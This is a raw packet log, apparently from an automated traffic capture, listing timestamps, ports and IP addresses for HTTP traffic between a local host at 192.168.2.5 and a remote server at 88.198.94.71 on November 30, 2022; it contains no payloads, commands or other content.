Nov 30, 2022 00:22:31.959062099 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959073067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959084988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959098101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959120035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959124088 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959137917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959145069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959161043 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959170103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959193945 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959211111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959218025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959244967 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959270954 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959384918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959427118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959450960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959475040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959500074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959523916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959547997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959572077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959585905 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959597111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959619045 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959620953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959647894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959671021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959671974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959685087 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959696054 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959713936 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959723949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959736109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959747076 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959770918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.959784985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.959813118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960292101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960316896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960340023 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960344076 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960356951 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960364103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960377932 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960390091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960407019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960413933 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960431099 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960438013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960454941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960463047 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960477114 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960486889 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960503101 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960510969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960525990 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960536003 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960551977 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960560083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960575104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960599899 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960711956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960760117 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960810900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960834980 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960858107 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960860014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960877895 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960885048 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960900068 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960908890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960932970 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960938931 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960951090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.960957050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960980892 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.960987091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961005926 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961025000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961025000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961030960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961044073 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961055994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961071014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961093903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961364985 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961416960 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961766958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961791039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961813927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961817980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961831093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961857080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961872101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961899042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961916924 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961939096 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.961963892 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.961987972 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962003946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962013960 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962030888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962038994 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962057114 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962071896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962076902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962096930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962110996 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962152004 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962187052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962210894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962233067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962234974 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962251902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962260008 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962282896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962284088 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962301970 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962311029 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962332010 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962333918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962349892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962371111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962369919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962379932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962393999 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962405920 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962419033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962424994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962443113 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962444067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962469101 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962471008 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962486982 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962493896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.962519884 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.962532997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967406034 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967432976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967457056 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967480898 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967505932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967515945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967530966 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967556953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967559099 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967576027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967581987 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967606068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967607975 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967618942 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967629910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967653990 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967672110 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967699051 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967700958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967745066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967746973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967772007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967789888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967797041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967816114 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967820883 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967838049 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967847109 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967860937 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967871904 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967884064 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967895985 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967909098 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967920065 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967932940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967943907 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967957020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967968941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.967983961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.967993975 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968008995 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968031883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968410969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968430042 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968483925 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968539953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968580961 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968585014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968625069 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968626976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968647957 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968666077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968668938 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968688011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968691111 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968708038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968713999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968734980 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968750000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968769073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968787909 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968806982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968812943 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968827009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968828917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968852997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968868017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968874931 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968894958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968914032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968920946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968933105 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968938112 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968957901 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968962908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.968983889 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.968997002 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969006062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969018936 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969037056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969038010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969058037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969058037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969078064 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969079018 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969098091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969103098 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969118118 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969136953 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969142914 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969156981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969165087 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969173908 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969192028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969213963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969294071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969315052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969333887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969353914 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969367027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969410896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969599009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969620943 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969635963 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969650030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969666958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969681025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969696045 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969717026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969731092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969744921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969769001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969773054 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969778061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969786882 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969800949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969820976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969831944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969841003 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.969866037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.969908953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970047951 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970069885 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970088959 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970108032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970120907 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970127106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970155001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970172882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970240116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970259905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970288038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970308065 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970316887 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970326900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970346928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970356941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970366955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970376015 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970386982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970407009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970407963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970428944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970434904 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970449924 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.970460892 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970479012 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970499992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.970990896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971013069 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971066952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971091032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971111059 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971129894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971136093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971149921 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971163988 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971169949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971180916 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971189022 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971199989 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971210003 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971216917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971230030 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971235037 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971251011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971251011 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971271038 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971271038 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971291065 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971296072 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971308947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971311092 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971332073 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971335888 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971360922 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971380949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971631050 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971652031 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971695900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971703053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971734047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971858025 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971878052 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971895933 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971908092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971925020 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971940041 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.971944094 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.971982002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972011089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972038984 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972052097 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972059011 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972074986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972080946 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972095013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972100973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972115993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.972121954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.972138882 CET	49710	80	192.168.2.5	88.198.94.71
